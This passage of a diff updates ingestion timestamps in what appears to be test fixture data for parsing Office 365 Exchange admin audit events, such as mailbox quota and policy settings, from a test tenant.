Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -130,7 +130,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.852960600Z", + "ingested": "2021-12-14T14:49:28.056944409Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"6c3454e1-1a13-411b-bed1-08d7adfc0c09\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -211,7 +211,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.852966700Z", + "ingested": "2021-12-14T14:49:28.056945005Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:03\",\"ExternalAccess\":true,\"Id\":\"b5131b23-3efb-481a-c05b-08d7ac0f2a82\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -279,7 +279,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.852972800Z", + "ingested": "2021-12-14T14:49:28.056945523Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:09\",\"ExternalAccess\":true,\"Id\":\"ef597809-1c52-4a85-7cce-08d7adfc0939\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\2c6709f0-beaf-4ffd-99ea-d02c796c25d3\",\"Operation\":\"Install-DefaultSharingPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -347,7 +347,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.852977800Z", + "ingested": "2021-12-14T14:49:28.056945971Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:09\",\"ExternalAccess\":true,\"Id\":\"362ff802-6df6-47e5-09a2-08d7adfc095b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Install-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -416,7 +416,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.852981100Z", + "ingested": "2021-12-14T14:49:28.056946513Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"ea769bfc-fa67-465c-767a-08d7adfc0b7b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -486,7 +486,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.852985900Z", + "ingested": "2021-12-14T14:49:28.056946962Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:43\",\"ExternalAccess\":true,\"Id\":\"168019d2-1e8a-4394-e90b-08d7ac0f1e69\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}\"},{\"Name\":\"UMDataStorage\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -554,7 +554,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.852991Z", + "ingested": "2021-12-14T14:49:28.056947401Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:34\",\"ExternalAccess\":true,\"Id\":\"0d7995da-038f-40d9-2765-08d7ac0f3d4d\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\",\"Operation\":\"Set-OwaMailboxPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"InstantMessagingType\",\"Value\":\"Ocs\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -635,7 +635,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.852996300Z", + "ingested": "2021-12-14T14:49:28.056947839Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -716,7 +716,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853002Z", + "ingested": "2021-12-14T14:49:28.056948316Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -785,7 +785,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853006100Z", + "ingested": "2021-12-14T14:49:28.056948809Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:04\",\"ExternalAccess\":true,\"Id\":\"a0063917-bb25-4c17-fe2e-08d7ac0f0769\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -866,7 +866,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853010200Z", + "ingested": "2021-12-14T14:49:28.056949405Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:58\",\"ExternalAccess\":true,\"Id\":\"a324e83b-d1a3-4855-db2a-08d7ac0f277b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -947,7 +947,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853013600Z", + "ingested": "2021-12-14T14:49:28.056949895Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"ebda487f-6177-432a-e91d-08d7adfc0d0d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -1028,7 +1028,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853018300Z", + "ingested": "2021-12-14T14:49:28.056950393Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7dafe4a3-487a-46ec-dadc-08d7ac0f2e06\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -1109,7 +1109,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853023800Z", + "ingested": "2021-12-14T14:49:28.056950907Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 